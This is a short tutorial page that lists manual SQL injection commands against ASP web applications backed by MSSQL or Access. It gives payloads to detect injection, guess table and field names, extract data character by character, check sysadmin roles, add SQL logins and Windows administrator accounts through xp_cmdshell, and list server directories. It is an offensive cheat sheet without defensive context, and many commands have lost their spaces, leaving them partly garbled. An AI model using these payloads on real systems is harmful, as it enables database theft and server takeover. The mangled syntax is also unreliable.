Home>Network programming tutorial>ASP tutorial

I sorted out the manual injection script command [with comments]

Author:Eve Cole Update Time:2025-03-29 15:00:04

1. Determine whether there is injection; and1=1; and1=2

2. Preliminary judgment on whether it is mssql;anduser>0

3. Injection parameters are characters 'and[query condition] and''='

4. 'and[query condition] and'%25'=' of the filtered parameters during searching

5.Judge database system

;and(selectcount(*)fromsysobjects)>0mssql

;and(selectcount(*)frommsysobjects)>0access

6. Guess the database; and(selectCount(*) from [database name])>0

7. Guess the field; and(selectCount(field name) from database name)>0

8. Guess the record length in the field; and(selecttop1len(field name) from database name)>0

9.(1) Guess the ascii value of the field (access)

;and(selecttop1asc(mid(field name, 1, 1)) from database name)>0

(2) Guess the ascii value of the field (mssql)

;and(selecttop1unicode(substring(field name, 1, 1)) from database name)>0

10. Test permission structure (mssql)

;and1=(selectIS_SRVROLEMEMBER('sysadmin'));--

;and1=(selectIS_SRVROLEMEMBER('serveradmin'));--

;and1=(selectIS_SRVROLEMEMBER('setupadmin'));--

;and1=(selectIS_SRVROLEMEMBER('securityadmin'));--

;and1=(selectIS_SRVROLEMEMBER('diskadmin'));--

;and1=(selectIS_SRVROLEMEMBER('bulkadmin'));--

;and1=(selectIS_MEMBER('db_owner'));--

11. Add mssql and system account

;execmaster.dbo.sp_addloginusername;--

;execmaster.dbo.sp_passwordnull,username,password;-

;execmaster.dbo.sp_addsrvrolemembersysadminusername;--

;execmaster.dbo.xp_cmdshell'netuserusernamepassword

/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add';--

;execmaster.dbo.xp_cmdshell'netuserusernamepassword/add';--

;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add';--

12.(1)Transfer the directory

;createtabledirs(pathsvarchar(100),idint)

;insertdirsexecmaster.dbo.xp_dirtree'c:/'

;and(selecttop1pathsfromdirs)>0

;and(selecttop1pathsfromdirswherepathsnotin('paths obtained from the previous step'))>)

(2) Traverse the directory

;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));-

;inserttempexecmaster.dbo.xp_availablemedia;-get all current drives

;insertintotemp(id)execmaster.dbo.xp_subdirs'c:/';--Get subdirectory list

;insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:/';--Get the directory tree structure of all subdirectories

Related Articles